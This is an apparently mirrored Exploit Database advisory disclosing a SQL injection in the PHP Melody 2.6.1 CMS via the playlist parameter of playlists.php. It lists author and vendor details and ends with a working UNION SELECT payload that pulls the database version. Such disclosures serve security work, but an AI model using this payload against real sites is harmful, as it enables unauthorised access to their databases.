PHP Melody 2.6.1 – SQL Injection

• Exploit Database
• 21 阅读

• 作者： Venkat Rajgor
  日期： 2017-10-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43062/

• ###################################################
  [+] Author : Venkat Rajgor
  [+] Email : Venki9990@gmail.com
  [+] Vulnerability : SQL injection
  ###################################################
  E-mail ID : support@phpsugar.com
  Download : http://www.phpsugar.com
  Web : http://www.phpsugar.com
  Price : $39 USD
  ###################################################
  Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
  Application : PHPSUGAR PHP Melody version 2.6.1
  Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
  ###################################################
  
  Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
  
  Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -